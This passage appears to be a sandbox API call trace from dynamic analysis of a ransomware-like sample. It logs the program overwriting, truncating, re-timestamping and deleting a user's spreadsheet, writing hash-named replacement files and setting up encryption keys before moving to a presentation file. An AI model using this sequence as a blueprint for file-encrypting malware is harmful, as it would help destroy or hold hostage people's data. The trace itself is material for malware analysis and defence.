nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252.info", lpFilePart=0x0) returned 0x4d [0074.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0074.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94ea079d23393052d969a1bc5c46a252.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.848] GetFileType (hFile=0x36c) returned 0x1 [0074.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0074.848] GetFileType (hFile=0x36c) returned 0x1 [0074.848] WriteFile (in: hFile=0x36c, lpBuffer=0x230f690*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x230f690*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0074.876] CloseHandle (hObject=0x36c) returned 1 [0074.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0074.877] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d8d890, ftCreationTime.dwHighDateTime=0x1d4e13d, ftLastAccessTime.dwLowDateTime=0xc603e3a0, ftLastAccessTime.dwHighDateTime=0x1d4bec7, ftLastWriteTime.dwLowDateTime=0xc603e3a0, ftLastWriteTime.dwHighDateTime=0x1d4bec7, nFileSizeHigh=0x0, nFileSizeLow=0x11257)) returned 1 [0074.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0074.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.877] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", dwFileAttributes=0x80) returned 1 [0074.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0074.878] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2317278 | out: lpFileInformation=0x2317278*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc3d8d890, ftCreationTime.dwHighDateTime=0x1d4e13d, ftLastAccessTime.dwLowDateTime=0xc603e3a0, ftLastAccessTime.dwHighDateTime=0x1d4bec7, ftLastWriteTime.dwLowDateTime=0xc603e3a0, ftLastWriteTime.dwHighDateTime=0x1d4bec7, nFileSizeHigh=0x0, nFileSizeLow=0x11257)) returned 1 [0074.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0074.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0074.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.878] GetFileType (hFile=0x36c) returned 0x1 [0074.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0074.878] GetFileType (hFile=0x36c) returned 0x1 [0074.878] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.879] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.880] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.881] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.882] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.882] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.883] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.884] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.885] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.885] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.886] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.887] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.887] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.888] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.889] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.890] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.890] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.891] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.891] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0074.891] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.892] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.893] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.894] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.894] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.895] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.896] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.897] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.897] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.898] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.899] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.900] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.900] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.901] WriteFile (in: hFile=0x36c, lpBuffer=0x2317700*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2317700*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.902] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.903] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.903] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.903] SetEndOfFile (hFile=0x36c) returned 1 [0074.904] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.905] CloseHandle (hObject=0x36c) returned 1 [0074.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.905] GetFileType (hFile=0x36c) returned 0x1 [0074.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.905] GetFileType (hFile=0x36c) returned 0x1 [0074.905] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.905] CloseHandle (hObject=0x36c) returned 1 [0074.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.905] GetFileType (hFile=0x36c) returned 0x1 [0074.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.906] GetFileType (hFile=0x36c) returned 0x1 [0074.906] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0074.906] CloseHandle (hObject=0x36c) returned 1 [0074.906] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.906] GetFileType (hFile=0x36c) returned 0x1 [0074.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.906] GetFileType (hFile=0x36c) returned 0x1 [0074.906] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0074.906] CloseHandle (hObject=0x36c) returned 1 [0074.906] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.906] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx")) returned 1 [0074.907] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.907] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", lpFilePart=0x0) returned 0x48 [0074.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94ea079d23393052d969a1bc5c46a252"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.907] GetFileType (hFile=0x36c) returned 0x1 [0074.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.907] GetFileType (hFile=0x36c) returned 0x1 [0074.907] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.907] CloseHandle (hObject=0x36c) returned 1 [0074.908] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", lpFilePart=0x0) returned 0x48 [0074.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94ea079d23393052d969a1bc5c46a252"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.908] GetFileType (hFile=0x36c) returned 0x1 [0074.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.908] GetFileType (hFile=0x36c) returned 0x1 [0074.908] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0074.908] CloseHandle (hObject=0x36c) returned 1 [0074.908] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", lpFilePart=0x0) returned 0x48 [0074.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94ea079d23393052d969a1bc5c46a252"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.908] GetFileType (hFile=0x36c) returned 0x1 [0074.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.908] GetFileType (hFile=0x36c) returned 0x1 [0074.908] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0074.909] CloseHandle (hObject=0x36c) returned 1 [0074.909] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0074.909] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0074.910] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x231aa88, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0074.910] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.910] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.910] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x231ab78, pdwDataLen=0x1bf5db30 | out: pbData=0x231ab78*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.910] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x231ac98, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0074.910] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.910] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.910] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626d00) returned 1 [0074.910] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.910] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x4, pbData=0x231ade0*=0x1, dwFlags=0x0) returned 1 [0074.910] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x1, pbData=0x231ad90, dwFlags=0x0) returned 1 [0074.910] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0074.910] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0074.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0074.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.961] GetFileType (hFile=0x36c) returned 0x1 [0074.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.961] GetFileType (hFile=0x36c) returned 0x1 [0074.961] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: 